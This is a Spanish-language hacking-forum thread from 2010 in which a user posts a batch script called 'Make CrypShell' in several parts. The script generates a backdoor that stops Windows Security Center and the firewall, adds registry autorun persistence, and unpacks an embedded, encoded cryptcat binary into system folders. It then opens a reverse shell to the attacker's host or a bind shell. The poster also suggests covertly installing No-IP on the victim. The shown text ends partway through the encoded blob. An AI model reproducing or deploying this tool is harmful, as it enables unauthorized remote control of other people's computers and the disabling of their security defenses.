elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Make CrypShell
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Make CrypShell  (Leído 7,483 veces)
<< Lucas, ¿quién más? >>

Desconectado Desconectado

Mensajes: 51


ANTI KIRCHNER- MONTONEROS - TERRORISTAS Y ASESINOS


Ver Perfil
Make CrypShell
« en: 12 Febrero 2010, 01:02 am »

Bueno, este es un código que me lo pasaron hace muchisimo tiempo (1 año y un poco más +/-) RockoX y Lukhardy, pero recién ahora lo publico ya que ellos no me lo permitian ya que estaban mejorandolo pero creo que no lo continuaron, hasta donde sé...

Lo que hace es simplemente crear un servidor del cryptcat con todas las configuraciones necesarias para conectar a un PC remoto. El código es totalmente seguro y trae todo un simple manual al final sobre cómo utilizarlo.

El código en realidad se hace grande porque incluye un binario, solo eso :silbar:.

Código:
@echo off
::por RockoX & Lukhardy
color 02
mode con cols=120
mode con lines=35
set LR=echo
set k=echo.
title --    Make CrypSHell v.1.0.0   --
%k%
%k%
%k%
%k%
%k%
%k%
%k%
%LR%           ========================================================================================
%k%

%LR%                            CCCCCCCC        RRRRRRRRRRRRRR  YYYYYY    YYYYYY  PPPPPPPPPPPP  
%LR%                          CCCC      CCCC    RRRR        RRRR  YYYY    YYYY    PPPP      PPPP
%LR%                        CCCC                RRRR        RRRR    YYYYYYYY      PPPP      PPPP
%LR%                        CCCC                RRRRRRRRRRRRRR      YYYYYYYY      PPPPPPPPPPPP  
%LR%                        CCCC                RRRR    RRRR          YYYY        PPPP          
%LR%                          CCCC      CCCC    RRRR    RRRRRR        YYYY        PPPP          
%LR%                            CCCCCCCC        RRRR      RRRRRR      YYYY        PPPP  
%k%
%LR%                                                 VERSION 1.0.0      
%k%
%LR%                          ssssssssss    hhhh    hhhh    eeeeeeeeeeee  llll        llll      
%LR%                        ssss            hhhh    hhhh    eeee          llll        llll      
%LR%                        ssssssssssss    hhhhhhhhhhhh    eeeeeeeeee    llll        llll      
%LR%                          ssssssssssss  hhhh    hhhh    eeee          llll        llll      
%LR%                                  ssss  hhhh    hhhh    eeee          llll        llll      
%LR%                        ssssssssssss    hhhh    hhhh    eeeeeeeeeeee  llllllllll  llllllllll
%k%
%k%
%LR%            ========================================================================================
%K%
%LR%                                                                               Por RockoX ^& Lukhardy
%LR%                                                                               [ - GPL - ]
pause>nul
cls
:menu
cls
%LR% --- Menu de configuracion ---
%k%
%LR% 1- Shell remota inversa (Server conecta con cliente)
%LR% 2- Shell remota directa (Cliente conecta con Server)
%k%
%LR% 3- RESERVADO PARA NIRCMD (No implementado en esta version)
%k%
%LR% _____________________________________________________________________________________
%LR% 4- Leer acerca de como ocultar la ventana del MS-DOS durante la ejecucion del script.
%LR% _____________________________________________________________________________________
set /p opc=
if ["%opc%"]==[""] (
cls
%LR% DEBES ESCRIBIR UNA OPCION VALIDA.
pause
goto :menu)
if NOT %opc%==1 (
if NOT %opc%==2 (
if NOT %opc%==3 (
if NOT %opc%==4 (
cls
%LR% DEBES ESCRIBIR UNA OPCION VALIDA.
pause
goto :menu
))))
if %opc%==1 goto :remotainversa
if %opc%==2 goto :remotadirecta
if %opc%==3 goto :Nrmd
if %opc%==4 goto :hide

:remotainversa
cls
%k%
%LR% ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
%LR%      CONFIGURACION DEL SERVER
%k%
%LR% --------------------------------------------
set /p Host=  Escribe tu direccion de IP o cuenta de No-IP:  
if ["%Host%"]==[""] (
goto:remotainversa
)
:Tipo_Shell
%k%
%lr% 1.-CMD.EXE
%lr% 2.-COMMAND.COM
%k%
set /p Shellx=Especifica el tipo de Shell :
if ["%Shellx%"]==[""] (
cls
goto:Tipo_Shell
)
if %Shellx% GTR 2 (
cls
goto:Tipo_Shell
)
if %Shellx% LSS 1 (
cls
goto:Tipo_Shell
)
rem Lista de puertos prohibidos :
rem Estos puertos son comunmente usados por el sistema, lo que lanzaria un error.
rem 137,138,139,443,445
:Port_Config
set /p puerto=  Puerto:
if ["%puerto%"]==[""] (
cls
goto:Port_Config  
)

for %%a in (137, 138, 139, 443, 445) do (
if %puerto%==%%a (
%lr% Puerto no accesible, intenta otro.
pause>nul
cls
goto:Port_Config
)
)
:Ruta_Remota
%LR% Especificar ruta en donde se creara cryptcat en la pc remota
%k%
%LR%[SE RECOMIENDA OPTAR POR CUALQUIERA DE ESTAS: (%%systemroot%% ^| %%windir%% ^| %%systemroot%\System32) ]
%k%
set /p ruta=  Ruta:  
if ["%ruta%"]==[""] (
cls
goto:Ruta_Remota
)
%LR% --------------------------------------------
:PING_CRP
%LR% Especificar TIEMPO en segundos en que se ejecutara Cryptcat Server (Para ver ayuda escribir HELP)
set /p ping= Segundos:  
if ["%ping%"]==[""] (
cls
goto:PING_CRP
)
if %ping% LSS 0 (
cls
goto:PING_CRP
)
if %ping%==HELP goto :Ayuda_ping
if %ping%==help goto :Ayuda_ping

:: Si el usuario no puso "HELP" ni "help" continua con el codigo usando la etiqueta ":next"
if NOT %ping%==HELP goto :Helpmini
:Helpmini
if NOT %ping%==help goto :next

:next
%LR% --------------------------------------------
set /p file=  Nombre del batch (no incluir extension):
if ["%file%"]==[""] (
cls
goto:Next
)
if %file:~-4%==.bat (
cls
echo No debias incluir extension en el nombre del Archivo.
pause>nul
goto:next
)
%k%
setlocal
:Autorun
set /p autorun= Crear autorun en registro? (S/N):
if ["%autorun%"]==[""] (
cls
goto:Autorun
)
if %autorun%==s goto :crearautorun
if %autorun%==S goto :crearautorun
if %errorlevel%==1 (%LR% Decidiste no crear el Autorun, pero puedes hacerlo modificando el codigo mas tarde.)
endlocal
:crearautorun
set /p autorun= Escribe el Nombre del valor:
if ["%autorun%"]==[""] (
cls
goto:crearautorun
)
%k%
pause
cls
%k%
%k%
%LR% RECUERDA:
%LR% Lo que debes escribir en tu cryptcat para poder conectarte es al server que acabas de crear es:
%k%
%LR%      cryptcat -vv -L -p %puerto%
%LR% Para que lo recuerdes se creo un archivo CONECTADO.TXT en tu disco %homedrive%.
%LR% Has creado un server que trabaja en el puerto %puerto%>"%homedrive%\Conectado.txt"
%LR% Para hacerlo debes escribir: cryptcat -vv -L -p %puerto%>>"%homedrive%\Conectado.txt"
%LR% Atentamente: Lukhardy ^& RockoX>>"%homedrive%\Conectado.txt"
%k%
pause

:: Muestra un mensaje indicando que se esta creando el archivo
%LR% ::::::::::::::::::::::::::::::::::::::::::::::::::::::
%k%
%LR%     Creando %file%.bat ^>^>^>
%k%
%LR% ::::::::::::::::::::::::::::::::::::::::::::::::::::::
%k%
%LR%     Al concluir se cerrara Crypshell. Suerte.
%k%
%LR% ::::::::::::::::::::::::::::::::::::::::::::::::::::::
%k%

:: Se crea el archivo en el que contendra los comandos necesarios
::para la ejecucion del cryptcat en forma INVERSA
%LR%@echo off>%file%.bat
%LR%net stop "Centro de seguridad">>%file%.bat
%LR%net stop "SharedAccess">>%file%.bat
%LR%net stop "Firewall de Windows/Conexi¢n compartida a Internet (ICS)">>%file%.bat
%LR%set LR=echo >>%file%.bat
%LR%reg query hklm\software\microsoft\windows\currentversion\run /v %autorun%>>%file%.bat
%LR%if errorlevel 1 (>>%file%.bat
%LR%reg add hklm\software\microsoft\windows\currentversion\run /v %autorun% /t reg_sz /d %ruta%\cryptcat.exe>>%file%.bat
%LR%) else (goto :verificarcryp)>>%file%.bat
%LR%:verificarcryp>>%file%.bat
%LR%if exist %ruta%\cryptcat.exe (goto :openshell)>>%file%.bat
%LR%call:crp^>^"temp.com^">>%file%.bat
%LR%call temp.com^>nul>>%file%.bat
%LR%if exist cryptcat.exe (goto :proceso)>>%file%.bat
%LR%:proceso>>%file%.bat
%LR%del /f /q temp.com>>%file%.bat
%LR%move cryptcat.exe %ruta%\cryptcat.exe>>%file%.bat
%LR%if exist %ruta%\cryptcat.exe (goto :openshell)>>%file%.bat
%LR%:openshell>>%file%.bat
%LR%ping -n %ping% localhost^>nul>>%file%.bat
%LR%cryptcat -d -e %Shellx% %Host% %puerto%>>%file%.bat
%LR%goto :openshell>>%file%.bat
%LR%:crp>>%file%.bat
call:crp>>%file%.bat

:remotadirecta
cls
%k%
%LR% ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
%LR%      CONFIGURACION DEL SERVER
%LR% --------------------------------------------
:Tipo_Shell_directa
%k%
%lr% 1.-CMD.EXE
%lr% 2.-COMMAND.COM
%k%
set /p Shelld=Especifica el tipo de Shell :
if ["%Shelld%"]==[""] (
cls
goto:Tipo_Shell_directa
)
if %Shelld% LSS 1 (
cls
goto:Tipo_Shell_directa
)
if %Shelld% GTR 2 (
cls
goto:Tipo_Shell_directa
)
rem Lista de puertos prohibidos :
rem Estos puertos son comunmente usados por el sistema, lo que lanzaria un error.
rem 137,138,139,443,445
:Port_Config_Directa
%LR% --------------------------------------------
set /p puertod=  Escribe el puerto por el que conectaras:  
%LR% --------------------------------------------
if ["%puertod%"]==[""] (
goto:Port_Config_Directa
)
for %%a in (137, 138, 139, 443, 445) do (
if %puertod%==%%a (
%lr% Puerto no accesible, intenta otro.
pause>nul
cls
goto:Port_Config_Directa
)
)
:Ruta_remota_directa
%LR% Especificar ruta en donde se creara cryptcat en la pc remota
%k%
%LR%  [SE RECOMIENDA OPTAR POR CUALQUIERA DE ESTAS: (%%systemroot%% ^| %%windir%% ^| %%systemroot%\System32) ]
%k%
set /p ruta=  Ruta:  
if ["%ruta%"]==[""] (
cls
goto:Ruta_remota_directa
)
:NameBatch
%LR% --------------------------------------------
set /p file=  Nombre del batch (no incluir extension):
if ["%file%"]==[""] (
cls
goto:NameBatch
)
if %file:~-4%==.bat (
cls
echo No debias incluir extension en el nombre del Archivo.
pause>nul
goto:NameBatch
)
%k%
:CrearAutorun_Directa
setlocal
set /p autorun= Crear autorun en registro? (S/N):
if ["%autorun%"]==[""] (
cls
goto:CrearAutorun_Directa
)
if %autorun%==s goto :crearautorun
if %autorun%==S goto :crearautorun
if errorlevel 1 (%LR% Decidiste no crear el autorun, pero puedes hacerlo modificando el codigo mas tarde)
endlocal
:crearautorun
set /p autorun= Escribe el Nombre del valor:
if ["%autorun%"]==[""] (
cls
goto:Crearautorun
)
%k%
pause
cls
%k%
%k%
:recordatorio_Directa
%LR% RECUERDA:
%LR% Para conectar con el server debes escribir:
%LR%     cryptcat -vv IP/HOST_de_la_PC_Remota %pertod%
%k%
%LR% El problema de siempre: algunas IP son dinamicas entonces seria un poco dificil encontrar
%LR% la IP en donde esta el cryptcat de la PC remota. Por lo que se sugiere instalarle de forma
%LR% sigilosa el NO-IP en la PC remota y asi poder conectarte usando el HOST del NO-IP o
%LR% emplear cualquier metodo para hacerlo =P.
%k%
%LR% Para que lo recuerdes se creo un archivo CONECTADO.TXT en tu disco %homedrive%.
%LR% Has creado un server que trabaja en el puerto %puertod%>"%homedrive%\Conectado.txt"
%LR% Para hacerlo debes escribir: cryptcat -vv IP/HOST_de_la_PC_Remota %puertod%>>"%homedrive%\Conectado.txt"
%LR% Atentamente: Lukhardy ^& RockoX>>"%homedrive%\Conectado.txt"
pause
cls

Continúa abajo...


« Última modificación: 12 Febrero 2010, 01:32 am por Lucas AC » En línea



Personalmente, prefiero tecnologías de Microsoft. Yo reconozco que defendí el software libre, pero ahora yo quiero vivir de esto. Mi trabajo.
<< Lucas, ¿quién más? >>

Desconectado Desconectado

Mensajes: 51


ANTI KIRCHNER- MONTONEROS - TERRORISTAS Y ASESINOS


Ver Perfil
Make CrypShell: Parte 2
« Respuesta #1 en: 12 Febrero 2010, 01:05 am »

...Continuación.

Código:
:: Muestra un mensaje indicando que se esta creando el archivo
%LR% ::::::::::::::::::::::::::::::::::::::::::::::::::::::
%k%
%LR%     Creando %file%.bat ^>^>^>
%k%
%LR% ::::::::::::::::::::::::::::::::::::::::::::::::::::::
%k%
%LR%     Al concluir se cerrara Crypshell. Suerte.
%k%
%LR% ::::::::::::::::::::::::::::::::::::::::::::::::::::::
%k%

:: Se crea el archivo en el que contendra los comandos necesarios
:: para la ejecucion del cryptcat en forma DIRECTA
%LR%@echo off>%file%.bat
%LR%net stop "Centro de seguridad">>%file%.bat
%LR%net stop "SharedAccess">>%file%.bat
%LR%net stop "Firewall de Windows/Conexi¢n compartida a Internet (ICS)">>%file%.bat
%LR%set LR=echo >>%file%.bat
%LR%reg query hklm\software\microsoft\windows\currentversion\run /v %autorun%>>%file%.bat
%LR%if errorlevel 1 (>>%file%.bat
%LR%reg add hklm\software\microsoft\windows\currentversion\run /v %autorun% /t reg_sz /d %ruta%\cryptcat.exe>>%file%.bat
%LR%) else (goto :verificarcryp)>>%file%.bat
%LR%:verificarcryp>>%file%.bat
%LR%if exist %ruta%\cryptcat.exe (goto :openshell)>>%file%.bat
%LR%call:crp^>^"temp.com^">>%file%.bat
%LR%call temp.com^>nul>>%file%.bat
%LR%:Buscando>>%file%.bat
%LR%if exist cryptcat.exe (goto :proceso) else goto :Buscando>>%file%.bat
%LR%:proceso>>%file%.bat
%LR%del /f /q temp.com>>%file%.bat
%LR%move cryptcat.exe %ruta%\cryptcat.exe>>%file%.bat
%LR%:ejecutar>>%file%.bat
%LR%if exist %ruta%\cryptcat.exe (goto :openshell) else goto :ejecutar>>%file%.bat
%LR%:openshell>>%file%.bat
%LR%@echo off>>%file%.bat
%LR%:buc>>%file%.bat
%LR%cryptcat -l -d -e %Shelld% -p %puertod%>>%file%.bat
%LR%goto:buc>>%file%.bat
%LR%:crp>>%file%.bat
call:crp>>%file%.bat


:Nrmd
:: Espacio reservado para el nircmd
cls
%k%
%LR%    OPCION AUN NO IMPLEMENTADA EN ESTA VERSION
%k%
pause
cls
goto :menu

Continúa...


En línea



Personalmente, prefiero tecnologías de Microsoft. Yo reconozco que defendí el software libre, pero ahora yo quiero vivir de esto. Mi trabajo.
<< Lucas, ¿quién más? >>

Desconectado Desconectado

Mensajes: 51


ANTI KIRCHNER- MONTONEROS - TERRORISTAS Y ASESINOS


Ver Perfil
Make CrypShell: Parte 3
« Respuesta #2 en: 12 Febrero 2010, 01:11 am »

...Continuación.

Código:
:: Etiqueta contenedora del cryptcat (el cryptcat esta comprimido con nspack)
:crp
%LR%%%LR%%XPPPYZIQD[L-f6-g41GDSXu'@,~P^^^^P_O,!(GU(GZ(Gnu5-NETSEND_V1.00_JRT=
%LR%%%LR%%CFFFRX,`,`2$F=@!t.rQ0%%%%IuL0%%%%(%%%%(%%%%GERYAARX2%%%%(%%%%t8-CRYPTCAT.EXE_080E2
%LR%%%LR%%1v1v0^^^<0xD^^^"1^^^<0$G^^^"P/0A0^^^^F^^^"12d^^^"1TP)0B0z0z1^^^^Q+0m1TQ-w^^^"1+1S1#0B0zd^^^"0]
%LR%%%LR%%Q+0z0Y1_1o0Sh^^^"0u0XP*d^^^"0]P,0z0Y1_1uv^^^"P-q^^^"e^^^"e^^^"0S0.0^^^>1kP-0^^^&E^^^"001S1.
%LR%%%LR%%0S130X1(K^^^"100(100(100(0T16v^^^"081/0$M^^^"070S050T0-v^^^"0/0C0T0^^^"v^^^"081/0$
%LR%%%LR%%M^^^"070X17I^^^"0XQ+L^^^"0_N^^^"0S050T0-v^^^"0/0C0X1#L^^^"1S0#1#0F19P*D^^^"0^^^<Q/1F1C0^^^<
%LR%%%LR%%1#D^^^"1C0i1^^^<0x1Y0^^^<P*D^^^"0p17!(c)JIM_TUCKER_jtucker@adam.com.au_XXXX^^^<
%LR%%%LR%%s'Y^^^<QQ,m.4YN^^^&t$d19].($^^^&`?gk/neVx,AtyU^^^^6!.Tro=^^^&^^^"!K`hXN^^^"-4PTqI@7ZG
%LR%%%LR%%Gkq1!'Ok4^^^"nZmHCwD\NV/'-4.foCPobxF(R[b9SaE'm68\=-,D^^^^Sjg2,4Hh=^^^".=-
%LR%%%LR%%bFY?oh+ojpq9u5/(r_Bhx=!?OQ!N!'Ek%%%%9#\qk^^^"ifvsw^^^^cdQr{,;YW!,YC!mv7Yu
%LR%%%LR%%i-4Y)Ib'Q(_9ee)Jbb!'jNE')-'nNJ^^^&B$p)BFzvj=.HD'eEv]N?xj29F$x^^^"y:MBY
%LR%%%LR%%ek8*j/E'*R(W:L+#Sm'@3h:^^^>!'!!!!,8!!,7yY!,N^^^"!!!!!!!)!!!!!!!!!!!!!!
%LR%%%LR%%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!(!!!!!YMZ#K$x'r:KdQ^^^<!Zc=a3R2Vp(Wj5w
%LR%%%LR%%C8Z_RfaGr4r^^^^)\/GI7^^^^*NVaC^^^"NXhgBFiD^^^<[;3AOi7O!!!!!!!1mmVxp7^^^>b+C]w7]
%LR%%%LR%%eK\H5akg7lV7=mHn\pCF!{Z^^^^q4^^^>#O=`q:?fD\I#SseS^^^^\-^^^>-^^^&2wd,?C6^^^>d+:tJ7]
%LR%%%LR%%0!;W5emqN^^^>?!V:JN`e!Z:r_MR;FL^^^"6!!!!!!!!!^^^&^^^"P!!'_#n!^^^"cl-z!!!!!!!!!!
%LR%%%LR%%og!]^^^"KN2Bf!!!!!!N^^^"!!!Y!1$7!a7O!1!!!#!!N^^^"!!N^^^"!!N^^^"!!!)!!!a!!!!!!!!
%LR%%%LR%%^^^"F!!!!!!!!!)!1!!^^^&Z!#^^^>6N^^^"!'!!!!!!^^^&Z!!7O!!!!,8!!N^^^"!!!!!!#k!!!!!!!!
%LR%%%LR%%!!!!^^^"^^^&7O^^^&ZK3!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
%LR%%%LR%%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
%LR%%%LR%%!!!!!!!!!!!!!!!!!!!!!!!!^^^"^^^"n^^^^nCN^^^"!!!^^^"dPN^^^"!A!!!!!!!!!1!!!!!!!!!!!!
%LR%%%LR%%!!!!!Q!!%%%%uA\X/NS!!!!!a!!!^^^"!!7V'{!!!!^^^&Z!!!!!!!!!!!!!!!!1q!^^^"d[WbW_
%LR%%%LR%%2V!!!2#k!!!!!1!!!!!!!#!!!!!!!!!!!!!!!!!'!!!Y!!!!!!!!!!!!!!!!!!!!
%LR%%%LR%%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
%LR%%%LR%%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
%LR%%%LR%%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
%LR%%%LR%%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
%LR%%%LR%%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
%LR%%%LR%%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
%LR%%%LR%%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
%LR%%%LR%%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
%LR%%%LR%%#,,8!!!!!!!=!)!!!!!#^^^<HN2!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
%LR%%%LR%%!!!!!!!!!!!!!!!!^^^&Z!!!!!!#K#+!!!!!!!9^^^"F!!!!!!!!!!!!!!!!!!!!!!!!!!
%LR%%%LR%%!!!!!!!!!!j.7O!!!!!!!!!!!!!!!!!!!!!!7O!!!!!!'RS[!!!!!!!!!!!!!!!!
%LR%%%LR%%(4,^^^<!2d`^^^&ZEu7W!fNB,9=mN2#0!a7O!!!!'[!!7O!!!!!!!!!!!!!!!!!!!`,8#k
%LR%%%LR%%X$!%%%%!!!!!!!!!!!!!!!!.BN2%%%%^^^&!!7O!!!!!!!!!!!!!!!!!!!!!!!!.6^^^>vX%%%%^^^>3W!
%LR%%%LR%%19QB1q0A2zcwhuI-;lN^^^"!!.HwQgR*9'qC9^^^<m^^^"F!!^^^"ThA('ToCs0]T92m4F!!!#`%%%%
%LR%%%LR%%I7S0P^^^"/..`ro@7Y9!!$i[^^^<5L?9m-A$CzCk!!!L3R.jsSA#3-D\Y9!!-4P^^^>rj+^^^&L;
%LR%%%LR%%D^^^^Gk!!!!,x!!!!#+!!!!7O!!,8!!0L?w!!*.!!IqDL2EJF^^^<mW{+3!!!!#^^^&#f80G$
%LR%%%LR%%s:ofz^^^>*n^^^&y#{N2!!fZ!'1[U^^^^?rz=zz;xM^^^<ofyYh^^^>od{^^^"py^^^^cz]zz^^^"Q1wZ^^^^j.^^^"F!!
%LR%%%LR%%EU!a!!3[^^^&Y/lN!{^^^"P$!_'4!Q!^^^"'`F)x3z{!!!!!^^^&bxj.dP!$mG$_Z6NB!!eWi=Bc
%LR%%%LR%%^^^"=^^^^)yXzvcj#:dS\2O?oyq1!!!^^^"l=^^^^:#k!!!-tap^^^<:DJN+4^^^^s'pE!%%%%rNgJ0Zrz{\A
%LR%%%LR%%{^^^"{^^^"zXQp{^^^"z`wCB5R^^^&`SyXzn@p$P!(zNA,;HM^^^>yi#S$pu]:)fG!#!!!'Y:zkF)x3
%LR%%%LR%%{^^^"v^^^>ET{^^^"xOFeMt{^^^"Qzdr3f#s`))HYXg?Ipum+6UsO?^^^"#z:@#N17S![$XYmHKnq;m
%LR%%%LR%%BFRQ#_^^^"R*n,Y_^^^>@^^^&Q\oy*PC'!B%%%%f$n4cfk,V^^^&=Nz^^^&1jPud(jr]7S!!9qnEz=zz@]
%LR%%%LR%%#{M]!(e=^^^&Z!!-^^^<T+Hf^^^&+s?ar$+FvMt{^^^"QwjcLV9I)PuEAa^^^>]xtH(-^^^"Zo^^^&0'!zn*g
%LR%%%LR%%$!Ey7hooYGRxuHYY6Gu!)Js{^^^&qls:^^^^M^^^>oi%%%%O0Oe1HH)9+BAL#[KO'tv-6a^^^&YZ63^^^>
%LR%%%LR%%x4^^^&*MSP(#S^^^&ZwR1r%%%%8z-i^^^"t\+e,c8R^^^":#kL9VJP-zUr9GJuC{^^^"uq@bmzY6{^^^"p\2R
%LR%%%LR%%!O\$%%%%`!fDT]gNE7O!A!^^^";bh5,7{^^^"lrvmx4,v)'N2!^^^"#\NggG!!!$i[82p%%%%#fe7a`
%LR%%%LR%%JmRV!!N^^^"^^^"uzc9({^^^"zh];#`Sk!!!-v6=8NA,9jB,pn,yXdOyd(nh)^^^<10;vQzZdt@_
%LR%%%LR%%#kK^^^<8sh5,7{^^^"lJmvB6K?3,H_N^^^"!!!%%%%,0!/NKP:nB^^^&Z!!2^^^&BfC^^^>cQ*kzmxKFWMt{^^^"
%LR%%%LR%%%%%%3e3'JN^^^"!^^^").BUx3z^^^^MG%%%%T!(=J#JNB^^^";#{H^^^<,85U1Gw1lh7RmgFC@bo=Y8{^^^"dkuI
%LR%%%LR%%O?e^^^&Beh4Y8{^^^"lrk.OF!^^^"jZf2@'z=zv*,O?d`imf:r]v*+;*4sqHs*oyn.(YY^^^&!yN
%LR%%%LR%%#s'+!3{^^^"{!z`OE1x!+/jzXeTuD{^^^"qYHC{^^^"s`F']u7?!^^^>^^^"Z7^^^^Q9oZz9MEuL#[dr4K
%LR%%%LR%%`[)X[RN^^^"!!]/y=A6$!H839@D$YjI7O!!Ih#:.v2V!!!=fcXTraBf!!57*N,r(4!!
%LR%%%LR%%!#?xj)bZ*ClmxvN^^^"!!$7PvfVB6Pl!!#V1FW6Ys.z6L^^^"hx{@^^^>T))PN^^^&??d!j87O!!
%LR%%%LR%%6J^^^&N!!55eo!^^^"7O^^^"9#;M^^^^z9NF(^^^&]oz7BVv^^^^R1^^^^9!N.l$rOy2(k+E$.^^^"vxuD{^^^"f8^^^<p
%LR%%%LR%%rU{^^^"z7K_3vOI!$=-zpZU{^^^"zz7M!Cf#mn^^^"TYd+!,I!#BfO.zA#\7X$TQ'$^^^&Pu!Aq4
%LR%%%LR%%C-#7,^^^>8)CG7Ovl$Y$/tH)^^^>PaP)j`^^^<P(/q2N^^^^^^^"!Br+W^^^&\uWI'Q9,ulm1Qoo!5l,A2
%LR%%%LR%%#kr%%%%Gar{K3v-,)D^^^&^^^>uX?:57]32yuNKBNO*b2#+c'?7qu2%%%%20$-^^^&p.D,VHEuXAoeR
%LR%%%LR%%EF0UM#6OpE)9lUW{v^^^<s8OrPgI\b6^^^^{r^^^>$sl7*n7/eluaj/R?9pVKWiN:puYhg6O_
%LR%%%LR%%0K?{^^^"ENr7?i+^^^<T%%%%4MR%%%%%%%%DuQ]tp^^^>ypNIMp/[es.KPwtdSb`'*j7z_`g96Jm7re[Se
%LR%%%LR%%jJm^^^"8i^^^<t10%%%%]jE7M+s:?M,CC+@m1^^^>om37*^^^>$)6vj,*y_Z(uA7e;7-#ad^^^<T)O^^^&Q83
%LR%%%LR%%yyKNVpP;g*lO_)^^^&\R/L'Q@^^^^^^^";v/nfckIQLd2H\0H7MOUBT;nm\J1v)^^^&`?#uIN^^^<^^^&f
%LR%%%LR%%+p^^^&nS9rS!I%%%%ido!*9XQ-t)-diM4%%%%9:-egk1(h0vw^^^^JN4A8.Ur`W-]RW{D*ToOjr@
%LR%%%LR%%XyFhN^^^<\)W([B.$TCexGs-9Er#6_GLHHKR^^^^dW7?'_60t^^^&jm9/Ic*Z1]!Dd0sB,Gnc
%LR%%%LR%%7iM)FS0GCA9S+H'XR1'cI\9DQ^^^&PM@F_%%%%O^^^&:]g36n)S.r+;_]/hQo^^^^sNhY@*A%%%%:O!
%LR%%%LR%%rqVfg4XP^^^"b^^^"hwNe'\,Qnl*Rj_79^^^"-=G^^^>T)lL#,ogS1-7Sbf(^^^"F^^^>V^^^<Y#,%%%%ZZwhIv4
%LR%%%LR%%5$-),_/v(^^^&W2!?7s3#tbq)js,lL^^^"2drAhmd#,;IkS^^^&hh3Q_1DyEZ4\:^^^>Gw80!@.U
%LR%%%LR%%r6[[*p]p1'U8g%%%%HP5.]N?'#mtXqs*^^^>EW@93^^^>Oh;jD0sm3Ji@\CP(OFKm_^^^>TX@L?v
%LR%%%LR%%J1^^^"F%%%%?!IknT:7^^^&qTS*Z`!(e\%%%%]bhOWNE)yexCkf7qq27@Q)\sYPv\XS[9^^^&4PX.IK
%LR%%%LR%%?#Q$w2$6.o#^^^"$*'FN6a%%%%,M.`I*!Qq60oX,Y;OHp4j6NF!Ir_OFyi*23{p*xuYt1e
%LR%%%LR%%^^^"CCKw!^^^"qYD6edmhI$Pe+VDE8!1rh:E_P0B+uEc998l,Z/wf4YEZUxuc!gA^^^&kehE^^^<
%LR%%%LR%%Q]y:=;;)\/qAe:IgN^^^".Rij;1OKfBuNo*=0JM,(m?kH1yxxv;1ejfceZ89'+w[+*x
%LR%%%LR%%jf,M*b8Xp^^^<sF^^^&)HS3kT-^^^>\@{!`z?e1t`0^^^>713]BvU,vg^^^&(Wy2v.Qyq[+NGk%%%%`1-5
%LR%%%LR%%^^^^v:VCEO#3LmWgx@GgP7zYP%%%%C+tl:GraE^^^&vSyko^^^&8hP3(5r7br*A7#-:$N6Sg[`?L
%LR%%%LR%%eH0W\pd4Roe4KqgJ'^^^<3r$29/iia(5+o8%%%%B`2^^^&c0^^^^gP^^^&s!R:p^^^&{8cYa;`Y)#t0opX
%LR%%%LR%%^^^"5ZoCw;(+wKtg_3^^^<Tl$]0V5NqY8S)k^^^<jjfy39*z2^^^^eX`1G^^^>j7(Oo53d^^^"7yZW#TBV
%LR%%%LR%%B/h\(dIl]{bFAH@=O?A`ONz88$Lj7OpQgI%%%%`fby=7c`vwmJBSka;'0F2r\S\_`,l
%LR%%%LR%%2*j.v95xZ\I0/M^^^&-Ww:F^^^&=f;OGN0=5;#;3bPPM7/^^^>I\0+%%%%^^^<tut+2N)du@=FKJ^^^"^^^^^^^>
%LR%%%LR%%O4eg)25c`^^^>uuvyO*'De6h'f:x4QIB{m*CE6zS[b,,FQKDb=Fpv[3awV,qp!=OhV.
%LR%%%LR%%Qi1gh{LG6-^^^>uoK!-k^^^<^^^&1rt^^^"aY^^^^;j6brRN`pgl\SJ)M%%%%6^^^^P2w=IKpZN#t/A^^^</#H5F
%LR%%%LR%%^^^>^^^<Bcfhr-I*LJ-`ktR0I9=/mcv*qEY{cc'^^^^O^^^<U5'B7^^^<gb!+3)N20w%%%%iV.!%%%%^^^"huy14

Continúa...
En línea



Personalmente, prefiero tecnologías de Microsoft. Yo reconozco que defendí el software libre, pero ahora yo quiero vivir de esto. Mi trabajo.
<< Lucas, ¿quién más? >>

Desconectado Desconectado

Mensajes: 51


ANTI KIRCHNER- MONTONEROS - TERRORISTAS Y ASESINOS


Ver Perfil
Make CrypShell: Parte 4
« Respuesta #3 en: 12 Febrero 2010, 01:12 am »

...Continuación.

Código:
%LR%%%LR%%BIm0p5N=VJ!!!!!!Aa!!N^^^"+*,8!!*n#k!^^^&^^^>]Dt*fiQj:JQrhd9XI58PeX]X0?LYF
%LR%%%LR%%[BuPxZryI%%%%o7H#q'E3C?4Z,M(te^^^&R^^^"gL^^^&b5tb(k^^^^r5R`3vh\YJj^^^^dU-RxArjBVco
